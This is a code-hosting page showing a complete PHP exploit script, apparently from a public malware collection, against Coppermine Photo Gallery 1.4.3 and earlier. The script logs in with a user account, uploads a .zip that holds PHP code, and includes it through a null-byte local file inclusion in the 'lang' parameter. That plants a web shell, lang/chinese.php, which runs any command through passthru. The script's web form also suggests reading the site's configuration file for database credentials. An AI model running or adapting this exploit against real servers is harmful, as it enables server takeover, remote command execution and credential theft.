PageRenderTime 46ms CodeModel.GetById 15ms RepoModel.GetById 1ms app.codeStats 0ms

/Backdoors/PHP/cpg_143_incl_xpl.php

http://web-malware-collection.googlecode.com/
PHP | 419 lines | 328 code | 14 blank | 77 comment | 33 complexity | 5937b131b67d8e0afdbd589251a5e176 MD5 | raw file
    

  1. <?php
    2. 

  2. #  ---cpg_143_incl_xpl.php                              15.38 04/12/2005       #
    3. 

  3. #                                                                              #
    4. 

  4. #           Coppermine Photo Gallery <= 1.4.3 remote commands execution        #
    5. 

  5. #                              coded by rgod                                   #
    6. 

  6. #                     site: http://retrogod.altervista.org                     #
    7. 

  7. #                                                                              #
    8. 

  8. #  -> this works regardless of any php.ini settings, you need a normal user    #
    9. 

  9. #  account with upload rights in personal albums and at least one album        #
    10. 

  10. #                                                                              #
    11. 

  11. #  usage: launch from Apache, fill in requested fields, then go!               #
    12. 

  12. #                                                                              #
    13. 

  13. #  Sun-Tzu: "The direct and the indirect lead on to each other in turn. It is  #
    14. 

  14. #  like moving in  a circle--you never come to  an end.  Who can  exhaust the  #
    15. 

  15. #  possibilities of their combination?"                                        #
    16. 

    17. 

  17. /* a short explaination:  arbitrary local inclusion issue in "lang"
    18. 

  18.    argument in init.inc.php , ex.:
    19. 

    20. 

  20.    http://[target]/[path]/thumbnails.php?lang=../album/userpics/10002/shell.zip%00
    21. 

  21.    (by a null char, regardless of magic_quotes_gpc settings, because of
    22. 

  22.    Coppermine magic quotes disable code)
    23. 

    24. 

  24.    we need to upload a malicious .zip file with php code inside in a personal
    25. 

  25.    album folder (no check on file contempt) and to include it (cycling inside
    26. 

  26.    folders we will search for it - a subfolder is created in album/userpics/ dir,
    27. 

  27.    it is numbered like this: 10000 + db userid).
    28. 

  28.    We don't see any ouput including it, so the .zip file install a backdoor
    29. 

  29.    called chinese.php inside Coppermine lang/ dir. Modify the .zip file code
    30. 

  30.    if you need. After first run, if succeeded, you can launch commands manually:
    31. 

    32. 

  32.    http://[target]/[path]/lang/chinese.php?suntzu=netstat%20-ano
    33. 

    34. 

  34.    however script checks if new "chinese language file" is already installed
    35. 

  35.                                                                               */
    36. 

  36. error_reporting(0);
    37. 

  37. ini_set("max_execution_time",0);
    38. 

  38. ini_set("default_socket_timeout",5);
    39. 

  39. ob_implicit_flush (1);
    40. 

  40. 

  41. echo'<html><head><title>**Coppermine Photo Gallery <= 1.4.3 remote cmmnds xctn**
    42. 

  42. </title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    43. 

  43. <style type="text/css"> body {background-color:#111111;   SCROLLBAR-ARROW-COLOR:
    44. 

  44. #ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color:  #1CB081; }  img
    45. 

  45. {background-color:   #FFFFFF   !important}  input  {background-color:    #303030
    46. 

  46. !important} option {  background-color:   #303030   !important}         textarea
    47. 

  47. {background-color: #303030 !important} input {color: #1CB081 !important}  option
    48. 

  48. {color: #1CB081 !important} textarea {color: #1CB081 !important}        checkbox
    49. 

  49. {background-color: #303030 !important} select {font-weight: normal;       color:
    50. 

  50. #1CB081;  background-color:  #303030;}  body  {font-size:  8pt       !important;
    51. 

  51. background-color:   #111111;   body * {font-size: 8pt !important} h1 {font-size:
    52. 

  52. 0.8em !important}   h2   {font-size:   0.8em    !important} h3 {font-size: 0.8em
    53. 

  53. !important} h4,h5,h6    {font-size: 0.8em !important}  h1 font {font-size: 0.8em
    54. 

  54. !important} 	h2 font {font-size: 0.8em !important}h3   font {font-size: 0.8em
    55. 

  55. !important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
    56. 

  56. normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
    57. 

  57. { text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
    58. 

  58. color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica,  sans-serif;
    59. 

  59. font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica,  sans-serif;
    60. 

  60. font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
    61. 

  61. **Coppermine Photo Gallery <= 1.4.3 remote cmmnds xctn** </p><p class="Stile6">a
    62. 

  62. script  by  rgod  at    <a href="http://retrogod.altervista.org"target="_blank">
    63. 

  63. http://retrogod.altervista.org</a></p><table width="84%"><tr><td    width="43%">
    64. 

  64. <form name="form1" method="post"   action="'.$_SERVER[PHP_SELF].'">    <p><input
    65. 

  65. type="text"  name="host"> <span class="Stile5">* target    (ex:www.sitename.com)
    66. 

  66. </span></p> <p><input type="text" name="path">  <span class="Stile5">* path (ex:
    67. 

  67. /coppermine/ or just / ) </span></p><p><input type="text" name="cmd">      <span
    68. 

  68. class="Stile5">* specify a command ("cat ./../include/config.inc.php" to see dat
    69. 

  69. abase username & password...)</span></p><p><input  type="text" name="USER"><span
    70. 

  70. class="Stile5"> a valid USER with upload rights in personal album folder </span>
    71. 

  71. </p><p> <input  type="text" name="PASS">   <span class="Stile5"> ... and PASSWOR
    72. 

  72. D, required for STEP 1 and following... </span>  </p>  <p>  <input   type="text"
    73. 

  73. name="port"><span class="Stile5">specify  a  port other than  80 (default value)
    74. 

  74. </span></p><p><input type="text" name="proxy"><span class="Stile5">send  exploit
    75. 

  75. through an HTTP proxy (ip:port)</span></p><p> <input type="submit" name="Submit"
    76. 

  76. value="go!"></p></form></td></tr></table></body></html>';
    77. 

    78. 

  78. function show($headeri)
    79. 

  79. {
    80. 

  80.   $ii=0;$ji=0;$ki=0;$ci=0;
    81. 

  81.   echo '<table border="0"><tr>';
    82. 

  82.   while ($ii <= strlen($headeri)-1){
    83. 

  83.     $datai=dechex(ord($headeri[$ii]));
    84. 

  84.     if ($ji==16) {
    85. 

  85.       $ji=0;
    86. 

  86.       $ci++;
    87. 

  87.       echo "<td>&nbsp;&nbsp;</td>";
    88. 

  88.       for ($li=0; $li<=15; $li++) {
    89. 

  89.         echo "<td>".htmlentities($headeri[$li+$ki])."</td>";
    90. 

  90. 		}
    91. 

  91.       $ki=$ki+16;
    92. 

  92.       echo "</tr><tr>";
    93. 

  93.     }
    94. 

  94.     if (strlen($datai)==1) {
    95. 

  95.       echo "<td>0".htmlentities($datai)."</td>";
    96. 

  96.     }
    97. 

  97.     else {
    98. 

  98.       echo "<td>".htmlentities($datai)."</td> ";
    99. 

  99.     }
    100. 

  100.     $ii++;$ji++;
    101. 

  101.   }
    102. 

  102.   for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
    103. 

  103.     echo "<td>&nbsp&nbsp</td>";
    104. 

  104.   }
    105. 

  105.   for ($li=$ci*16; $li<=strlen($headeri); $li++) {
    106. 

  106.     echo "<td>".htmlentities($headeri[$li])."</td>";
    107. 

  107.   }
    108. 

  108.   echo "</tr></table>";
    109. 

  109. }
    110. 

  110. 

  111. $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
    112. 

  112. 

  113. function sendpacket() //2x speed
    114. 

  114. {
    115. 

  115.   global $proxy, $host, $port, $packet, $html, $proxy_regex;
    116. 

  116.   $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    117. 

  117.   if ($socket < 0) {
    118. 

  118.     echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
    119. 

  119.   }
    120. 

  120.   else {
    121. 

  121.     $c = preg_match($proxy_regex,$proxy);
    122. 

  122.     if (!$c) {echo 'Not a valid proxy...';
    123. 

  123.     die;
    124. 

  124.     }
    125. 

  125.   echo "OK.<br>";
    126. 

  126.   echo "Attempting to connect to ".$host." on port ".$port."...<br>";
    127. 

  127.   if ($proxy=='') {
    128. 

  128.     $result = socket_connect($socket, $host, $port);
    129. 

  129.   }
    130. 

  130.   else {
    131. 

  131.     $parts =explode(':',$proxy);
    132. 

  132.     echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
    133. 

  133.     $result = socket_connect($socket, $parts[0],$parts[1]);
    134. 

  134.   }
    135. 

  135.   if ($result < 0) {
    136. 

  136.     echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
    137. 

  137.   }
    138. 

  138.   else {
    139. 

  139.     echo "OK.<br><br>";
    140. 

  140.     $html= '';
    141. 

  141.     socket_write($socket, $packet, strlen($packet));
    142. 

  142.     echo "Reading response:<br>";
    143. 

  143.     while ($out= socket_read($socket, 2048)) {$html.=$out;}
    144. 

  144.     echo nl2br(htmlentities($html));
    145. 

  145.     echo "Closing socket...";
    146. 

  146.     socket_close($socket);
    147. 

  147.   }
    148. 

  148.   }
    149. 

  149. }
    150. 

  150. 

  151. function refresh()
    152. 

  152. {
    153. 

  153. flush();
    154. 

  154. ob_flush();
    155. 

  155. usleep(5000000000);
    156. 

  156. }
    157. 

  157. 

  158. function sendpacketii($packet)
    159. 

  159. {
    160. 

  160.   global $proxy, $host, $port, $html, $proxy_regex;
    161. 

  161.   if ($proxy=='') {
    162. 

  162.     $ock=fsockopen(gethostbyname($host),$port);
    163. 

  163.     if (!$ock) {
    164. 

  164.       echo 'No response from '.htmlentities($host); die;
    165. 

  165.     }
    166. 

  166.   }
    167. 

  167.   else {
    168. 

  168. 	$c = preg_match($proxy_regex,$proxy);
    169. 

  169.     if (!$c) {
    170. 

  170.       echo 'Not a valid prozy...';die;
    171. 

  171.     }
    172. 

  172.     $parts=explode(':',$proxy);
    173. 

  173.     echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
    174. 

  174.     $ock=fsockopen($parts[0],$parts[1]);
    175. 

  175.     if (!$ock) {
    176. 

  176.       echo 'No response from proxy...';die;
    177. 

  177. 	}
    178. 

  178.   }
    179. 

  179.   fputs($ock,$packet);
    180. 

  180.   if ($proxy=='') {
    181. 

  181.     $html='';
    182. 

  182.     while (!feof($ock)) {
    183. 

  183.       $html.=fgets($ock);
    184. 

  184.     }
    185. 

  185.   }
    186. 

  186.   else {
    187. 

  187.     $html='';
    188. 

  188.     while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
    189. 

  189.       $html.=fread($ock,1);
    190. 

  190.     }
    191. 

  191.   }
    192. 

  192.   fclose($ock);echo nl2br(htmlentities($html));
    193. 

  193.   refresh();
    194. 

  194. }
    195. 

  195. 

  196. $host=$_POST[host];$path=$_POST[path];
    197. 

  197. $port=$_POST[port];$cmd=$_POST[cmd];
    198. 

  198. $USER=$_POST[USER];$PASS=$_POST[PASS];
    199. 

  199. $proxy=$_POST[proxy];
    200. 

  200. echo "<span class=\"Stile5\">";
    201. 

  201. 

  202. if (($host<>'') and ($path<>'') and ($cmd<>''))
    203. 

  203. {
    204. 

  204.                $port=intval(trim($port));
    205. 

  205.                if ($port=='') {$port=80;}
    206. 

  206.                if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
    207. 

  207.                $host=str_replace("\r","",$host);$host=str_replace("\n","",$host);
    208. 

  208.                $path=str_replace("\r","",$path);$path=str_replace("\n","",$path);
    209. 

  209.                if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
    210. 

  210.                $cmd=urlencode($cmd);
    211. 

  211. 

  212.                #STEP 0 -> Check if backdoor already installed...
    213. 

  213.                $packet ="GET ".$p."lang/chinese.php?suntzu=$cmd HTTP/1.1\r\n";
    214. 

  214.                $packet.="Host: $host\r\n";
    215. 

  215.                $packet.="Connection: Close\r\n\r\n";
    216. 

  216.                show($packet);
    217. 

  217.                sendpacketii($packet);
    218. 

  218.                if (eregi("Hi Master!",$html)) {die("chinese.php already installed...<br>
    219. 

  219.                                                     Exploit succeeded...<br>"); }
    220. 

  220.                //if you are here
    221. 

  221.                if (($USER=='') | ($PASS==''))
    222. 

  222.                                               {die("chinese.php not installed<br>
    223. 

  223.                                                     we need a username and a password<br>");}
    224. 

  224. }
    225. 

  225. 

  226. if (($host<>'') and ($path<>'') and ($cmd<>'') and ($USER<>'') and ($PASS<>''))
    227. 

  227. {
    228. 

  228.                #STEP 1 -> Login...
    229. 

  229.                $data="username=".urlencode($USER)."&password=".urlencode($PASS)."&submitted=Login";
    230. 

  230.                $packet ="POST ".$p."login.php?referer=index.php HTTP/1.1\r\n";
    231. 

  231.                $packet.="Referer: http://".$host.$path."login.php?referer=index.php\r\n";
    232. 

  232.                $packet.="Host: $host\r\n";
    233. 

  233.                $packet."Accept-Language: en\r\n";
    234. 

  234.                $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
    235. 

  235.                $packet.="Content-Length: ".strlen($data)."\r\n";
    236. 

  236.                $packet.="Connection: Close\r\n";
    237. 

  237.                $packet.="Cache-Control: no-cache\r\n\r\n";
    238. 

  238.                $packet.=$data;
    239. 

  239.                show($packet);
    240. 

  240.                sendpacketii($packet);
    241. 

  241.                $temp=explode("Set-Cookie: ",$html);
    242. 

  242.                $temp2=explode(" ",$temp[1]);
    243. 

  243.                $COOKIE=$temp2[0];
    244. 

  244.                $temp2=explode(" ",$temp[2]);
    245. 

  245.                $COOKIE.=" ".str_replace(";","",$temp2[0]);
    246. 

  246.                $COOKIE=str_replace("\r","",$COOKIE);$COOKIE=str_replace("\n","",$COOKIE);
    247. 

  247.                echo "COOKIE ->".htmlentities($COOKIE)."<BR>";
    248. 

  248. 

  249.                #STEP 2 -> Upload the malicious zip file...
    250. 

  250.                $data='-----------------------------7d613b1d0448
    251. 

  251. Content-Disposition: form-data; name="file_upload_array[]"; filename="c:\suntzuuuu.zip"
    252. 

  252. Content-Type: application/octet-stream
    253. 

  253. 

  254. <?php $sun_tzu=fopen("./lang/chinese.php","w");
    255. 

  255. fputs($sun_tzu,"<?php echo \"Hi Master!\";ini_set(\"max_execution_time\",0);passthru(\$HTTP_GET_VARS[suntzu]);?>");
    256. 

  256. fclose($sun_tzu); chmod("./lang/chinese.php",777);?>
    257. 

  257. -----------------------------7d613b1d0448
    258. 

  258. Content-Disposition: form-data; name="file_upload_array[]"; filename=""
    259. 

  259. Content-Type: application/octet-stream
    260. 

  260. 

  261. 

  262. -----------------------------7d613b1d0448
    263. 

  263. Content-Disposition: form-data; name="file_upload_array[]"; filename=""
    264. 

  264. Content-Type: application/octet-stream
    265. 

  265. 

  266. 

  267. -----------------------------7d613b1d0448
    268. 

  268. Content-Disposition: form-data; name="file_upload_array[]"; filename=""
    269. 

  269. Content-Type: application/octet-stream
    270. 

  270. 

  271. 

  272. -----------------------------7d613b1d0448
    273. 

  273. Content-Disposition: form-data; name="file_upload_array[]"; filename=""
    274. 

  274. Content-Type: application/octet-stream
    275. 

  275. 

  276. 

  277. -----------------------------7d613b1d0448
    278. 

  278. Content-Disposition: form-data; name="URI_array[]"
    279. 

  279. 

  280. 

  281. -----------------------------7d613b1d0448
    282. 

  282. Content-Disposition: form-data; name="URI_array[]"
    283. 

  283. 

  284. 

  285. -----------------------------7d613b1d0448
    286. 

  286. Content-Disposition: form-data; name="URI_array[]"
    287. 

  287. 

  288. 

  289. -----------------------------7d613b1d0448
    290. 

  290. Content-Disposition: form-data; name="control"
    291. 

  291. 

  292. phase_1
    293. 

  293. -----------------------------7d613b1d0448--
    294. 

  294. ';
    295. 

    296. 

  296.                $packet ="POST ".$p."upload.php HTTP/1.1\r\n";
    297. 

  297.                $packet.="Referer: http://".$host.$path."upload.php\r\n";
    298. 

  298.                $packet.="Accept-Language: en\r\n";
    299. 

  299.                $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d613b1d0448\r\n";
    300. 

  300.                $packet.="Accept-Encoding: gzip, deflate\r\n";
    301. 

  301.                $packet.="Host: ".$host."\r\n";
    302. 

  302.                $packet.="Content-Length: ".strlen($data)."\r\n";
    303. 

  303.                $packet.="Connection: Close\r\n";
    304. 

  304.                $packet.="Cache-Control: no-cache\r\n";
    305. 

  305.                $packet.="Cookie: ".$COOKIE."\r\n\r\n";
    306. 

  306.                $packet.=$data;
    307. 

  307.                show($packet);
    308. 

  308.                sendpacketii($packet);
    309. 

  309.                $temp=explode("unique_ID\" value=\"",$html);
    310. 

  310.                $temp2=explode("\"",$temp[1]);
    311. 

  311.                $UNIQUE_ID=$temp2[0];
    312. 

  312.                echo "UNIQUE ID ->".htmlentities($UNIQUE_ID)."<BR>";
    313. 

  313. 

  314. 

  315.                #STEP 3 -> Select an album...
    316. 

  316. $data='-----------------------------7d6df34d0448
    317. 

  317. Content-Disposition: form-data; name="unique_ID"
    318. 

  318. 

  319. '.$UNIQUE_ID.'
    320. 

  320. -----------------------------7d6df34d0448
    321. 

  321. Content-Disposition: form-data; name="control"
    322. 

  322. 

  323. phase_2
    324. 

  324. -----------------------------7d6df34d0448--';
    325. 

    326. 

  326.                $packet ="POST ".$p."upload.php HTTP/1.1\r\n";
    327. 

  327.                $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
    328. 

  328.                $packet.="Referer: http://".$host.$path."upload.php\r\n";
    329. 

  329.                $packet.="Accept-Language: en\r\n";
    330. 

  330.                $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d6df34d0448\r\n";
    331. 

  331.                $packet.="Accept-Encoding: gzip, deflate\r\n";
    332. 

  332.                $packet.="Host: $host\r\n";
    333. 

  333.                $packet.="Content-Length: ".strlen($data)."\r\n";
    334. 

  334.                $packet.="Connection: Close\r\n";
    335. 

  335.                $packet.="Cache-Control: no-cache\r\n";
    336. 

  336.                $packet.="Cookie: ".$COOKIE."\r\n\r\n";
    337. 

  337.                $packet.=$data;
    338. 

  338.                show($packet);
    339. 

  339.                sendpacketii($packet);
    340. 

  340.                show($html);
    341. 

  341.                $junk=chr(0x0a).chr(0x20).chr(0x20).chr(0x20).chr(0x20).
    342. 

  342.                      chr(0x20).chr(0x20).chr(0x20).chr(0x20).chr(0x20).
    343. 

  343.                      chr(0x20).chr(0x20).chr(0x20).chr(0x20).chr(0x20).
    344. 

  344.                      chr(0x20).chr(0x20);
    345. 

  345.                $temp=explode("* Personal albums\">$junk<option value=\"",$html);
    346. 

  346.                $temp2=explode("\"",$temp[1]);
    347. 

  347.                $option=$temp2[0];
    348. 

  348.                if (($option=='') or (strlen($option)>2))
    349. 

  349.                { $option=1;}
    350. 

  350.                echo "ALBUM NUMBER ->".htmlentities($option)."<BR>";
    351. 

  351. 

  352.                #STEP 4 -> Insert .zip file in a valid album...
    353. 

  353. $data='-----------------------------7d628b39d0448
    354. 

  354. Content-Disposition: form-data; name="album"
    355. 

  355. 

  356. '.$option.'
    357. 

  357. -----------------------------7d628b39d0448
    358. 

  358. Content-Disposition: form-data; name="title"
    359. 

  359. 

  360. 

  361. -----------------------------7d628b39d0448
    362. 

  362. Content-Disposition: form-data; name="caption"
    363. 

  363. 

  364. 

  365. -----------------------------7d628b39d0448
    366. 

  366. Content-Disposition: form-data; name="keywords"
    367. 

  367. 

  368. 

  369. -----------------------------7d628b39d0448
    370. 

  370. Content-Disposition: form-data; name="control"
    371. 

  371. 

  372. phase_2
    373. 

  373. -----------------------------7d628b39d0448
    374. 

  374. Content-Disposition: form-data; name="unique_ID"
    375. 

  375. 

  376. '.$UNIQUE_ID.'
    377. 

  377. -----------------------------7d628b39d0448--
    378. 

  378. ';
    379. 

  379.                $packet="POST ".$p."upload.php HTTP/1.1\r\n";
    380. 

  380.                $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
    381. 

  381.                $packet.="Referer: http://".$host.$path."upload.php\r\n";
    382. 

  382.                $packet.="Accept-Language: en\r\n";
    383. 

  383.                $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d628b39d0448\r\n";
    384. 

  384.                $packet.="Accept-Encoding: gzip, deflate\r\n";
    385. 

  385.                $packet.="Host: $host\r\n";
    386. 

  386.                $packet.="Content-Length: ".strlen($data)."\r\n";
    387. 

  387.                $packet.="Connection: Close\r\n";
    388. 

  388.                $packet.="Cache-Control: no-cache\r\n";
    389. 

  389.                $packet.="Cookie: ".$COOKIE."\r\n\r\n";
    390. 

  390.                $packet.=$data;
    391. 

  391.                show($packet);
    392. 

  392.                sendpacketii($packet);
    393. 

  393. 

  394.                #STEP 5 -> Include the evil .zip file and launch commands...
    395. 

  395.                $anumber=9999;
    396. 

  396.                for ($i=0; $i<=200; $i++)
    397. 

  397.                {  $anumber++;
    398. 

  398.                   $xpl=urlencode("../albums/userpics/".$anumber."/suntzuuuu.zip".chr(0x00));
    399. 

  399.                   $packet ="GET ".$p."thumbnails.php?lang=$xpl HTTP/1.1\r\n";
    400. 

  400.                   $packet.="Host: $host\r\n";
    401. 

  401.                   $packet.="Connection: Close\r\n\r\n";
    402. 

  402.                   show($packet);
    403. 

  403.                   sendpacketii($packet);
    404. 

  404. 

  405.                   $packet ="GET ".$p."lang/chinese.php?suntzu=$cmd HTTP/1.1\r\n";
    406. 

  406.                   $packet.="Host: $host\r\n";
    407. 

  407.                   $packet.="Connection: Close\r\n\r\n";
    408. 

  408.                   show($packet);
    409. 

  409.                   sendpacketii($packet);
    410. 

  410.                   if (eregi("Hi Master!",$html)) {die ("Exploit succeeded...<br>
    411. 

  411.                   you have a shell in http://".htmlentities($host.$path)."/lang/chinese.php<br>");}
    412. 

  412.                }
    413. 

  413. //if you are here...
    414. 

  414. echo "Exploit failed...";
    415. 

  415. }
    416. 

  416. echo "</span>";
    417. 

  417. ?>
    418. 

  418. 

  419. # milw0rm.com [2006-02-17]
    420.